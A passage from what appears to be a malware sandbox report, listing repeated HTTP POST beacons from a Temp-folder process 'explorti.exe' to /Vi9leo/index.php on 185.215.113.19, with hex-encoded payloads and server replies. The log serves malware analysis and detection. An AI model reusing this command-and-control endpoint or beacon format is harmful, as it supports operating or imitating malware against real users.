                      Host: 185.215.113.19
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 26, 2024 20:57:07.061556101 CEST  219  IN  HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 18:57:06 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 26, 2024 20:57:07.062403917 CEST  306  OUT  POST /Vi9leo/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.19
                      Content-Length: 154
                      Cache-Control: no-cache
                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 41 32 44 37 37 42 39 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FBA2D77B95082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Jul 26, 2024 20:57:07.310533047 CEST  196  IN  HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 18:57:07 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                      4  192.168.2.4  49741  185.215.113.19  80  6200  C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                      Timestamp  Bytes transferred  Direction  Data
                      Jul 26, 2024 20:57:07.437958956 CEST  154  OUT  POST /Vi9leo/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.19
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 26, 2024 20:57:08.195735931 CEST  219  IN  HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 18:57:08 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 26, 2024 20:57:08.197449923 CEST  306  OUT  POST /Vi9leo/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.19
                      Content-Length: 154
                      Cache-Control: no-cache
                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 41 32 44 37 37 42 39 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FBA2D77B95082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Jul 26, 2024 20:57:08.447170973 CEST  196  IN  HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 18:57:08 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                      5  192.168.2.4  49742  185.215.113.19  80  6200  C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                      Timestamp  Bytes transferred  Direction  Data
                      Jul 26, 2024 20:57:08.563178062 CEST  154  OUT  POST /Vi9leo/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.19
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 26, 2024 20:57:09.325263977 CEST  219  IN  HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 18:57:09 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 26, 2024 20:57:09.329444885 CEST  306  OUT  POST /Vi9leo/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.19
                      Content-Length: 154
                      Cache-Control: no-cache
                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 41 32 44 37 37 42 39 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FBA2D77B95082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Jul 26, 2024 20:57:09.574621916 CEST  196  IN  HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 18:57:09 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                      6  192.168.2.4  49743  185.215.113.19  80  6200  C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                      Timestamp  Bytes transferred  Direction  Data
                      Jul 26, 2024 20:57:09.687731028 CEST  154  OUT  POST /Vi9leo/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.19
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 26, 2024 20:57:10.820327044 CEST  219  IN  HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 18:57:10 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 26, 2024 20:57:10.821593046 CEST  219  IN  HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 18:57:10 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 26, 2024 20:57:10.821752071 CEST  306  OUT  POST /Vi9leo/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.19
                      Content-Length: 154
                      Cache-Control: no-cache
                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 41 32 44 37 37 42 39 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FBA2D77B95082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Jul 26, 2024 20:57:11.073326111 CEST  196  IN  HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 18:57:10 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                      7  192.168.2.4  49744  185.215.113.19  80  6200  C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                      Timestamp  Bytes transferred  Direction  Data
                      Jul 26, 2024 20:57:11.187298059 CEST  154  OUT  POST /Vi9leo/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.19
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 26, 2024 20:57:11.996247053 CEST  219  IN  HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 18:57:11 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 26, 2024 20:57:11.998744011 CEST  306  OUT  POST /Vi9leo/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.19
                      Content-Length: 154
                      Cache-Control: no-cache
                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 41 32 44 37 37 42 39 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FBA2D77B95082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Jul 26, 2024 20:57:12.244764090 CEST  196  IN  HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 18:57:12 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                      8  192.168.2.4  49745  185.215.113.19  80  6200  C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                      Timestamp  Bytes transferred  Direction  Data
                      Jul 26, 2024 20:57:12.359446049 CEST  154  OUT  POST /Vi9leo/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.19
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 26, 2024 20:57:13.129484892 CEST  219  IN  HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 18:57:13 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 26, 2024 20:57:13.130716085 CEST  306  OUT  POST /Vi9leo/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.19
                      Content-Length: 154
                      Cache-Control: no-cache
                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 41 32 44 37 37 42 39 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FBA2D77B95082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Jul 26, 2024 20:57:13.382339001 CEST  196  IN  HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 18:57:13 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                      9  192.168.2.4  49746  185.215.113.19  80  6200  C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                      Timestamp  Bytes transferred  Direction  Data
                      Jul 26, 2024 20:57:13.505218983 CEST  154  OUT  POST /Vi9leo/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.19
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 26, 2024 20:57:14.272064924 CEST  219  IN  HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 18:57:14 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 26, 2024 20:57:14.272983074 CEST  306  OUT  POST /Vi9leo/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.19
                      Content-Length: 154
                      Cache-Control: no-cache
                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 41 32 44 37 37 42 39 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FBA2D77B95082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Jul 26, 2024 20:57:14.522800922 CEST  196  IN  HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 18:57:14 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                      10  192.168.2.4  49747  185.215.113.19  80  6200  C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                      Timestamp  Bytes transferred  Direction  Data
                      Jul 26, 2024 20:57:14.643167973 CEST  154  OUT  POST /Vi9leo/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.19
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 26, 2024 20:57:15.398758888 CEST  219  IN  HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 18:57:15 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 26, 2024 20:57:15.399614096 CEST  306  OUT  POST /Vi9leo/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.19
                      Content-Length: 154
                      Cache-Control: no-cache
                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 41 32 44 37 37 42 39 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FBA2D77B95082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Jul 26, 2024 20:57:15.646560907 CEST  196  IN  HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 18:57:15 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                      11  192.168.2.4  49748  185.215.113.19  80  6200  C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                      Timestamp  Bytes transferred  Direction  Data
                      Jul 26, 2024 20:57:15.765801907 CEST  154  OUT  POST /Vi9leo/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.19
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 26, 2024 20:57:16.517934084 CEST  219  IN  HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 18:57:16 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 26, 2024 20:57:16.519432068 CEST  306  OUT  POST /Vi9leo/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.19
                      Content-Length: 154
                      Cache-Control: no-cache
                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 41 32 44 37 37 42 39 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FBA2D77B95082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Jul 26, 2024 20:57:16.768125057 CEST  196  IN  HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 18:57:16 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                      12  192.168.2.4  49749  185.215.113.19  80  6200  C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                      Timestamp  Bytes transferred  Direction  Data
                      Jul 26, 2024 20:57:16.876135111 CEST  154  OUT  POST /Vi9leo/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.19
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 26, 2024 20:57:17.647362947 CEST  219  IN  HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 18:57:17 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 26, 2024 20:57:17.648288965 CEST  306  OUT  POST /Vi9leo/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.19
                      Content-Length: 154
                      Cache-Control: no-cache
                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 41 32 44 37 37 42 39 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FBA2D77B95082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Jul 26, 2024 20:57:17.897310972 CEST  196  IN  HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 18:57:17 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                      13  192.168.2.4  49750  185.215.113.19  80  6200  C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                      Timestamp  Bytes transferred  Direction  Data
                      Jul 26, 2024 20:57:18.031981945 CEST  154  OUT  POST /Vi9leo/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.19
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 26, 2024 20:57:18.803183079 CEST  219  IN  HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 18:57:18 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 26, 2024 20:57:18.805221081 CEST  306  OUT  POST /Vi9leo/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.19
                      Content-Length: 154
                      Cache-Control: no-cache
                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 41 32 44 37 37 42 39 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FBA2D77B95082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Jul 26, 2024 20:57:19.052527905 CEST  196  IN  HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 18:57:18 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                      14  192.168.2.4  49751  185.215.113.19  80  6200  C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                      Timestamp  Bytes transferred  Direction  Data
                      Jul 26, 2024 20:57:19.173304081 CEST  154  OUT  POST /Vi9leo/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.19
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 26, 2024 20:57:19.964478016 CEST  219  IN  HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 18:57:19 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 26, 2024 20:57:19.966052055 CEST  306  OUT  POST /Vi9leo/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.19
                      Content-Length: 154
                      Cache-Control: no-cache
                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 41 32 44 37 37 42 39 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FBA2D77B95082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Jul 26, 2024 20:57:21.093306065 CEST  196  IN  HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 18:57:20 GMT
                      Content-Type: text/html; charset=UTF-8
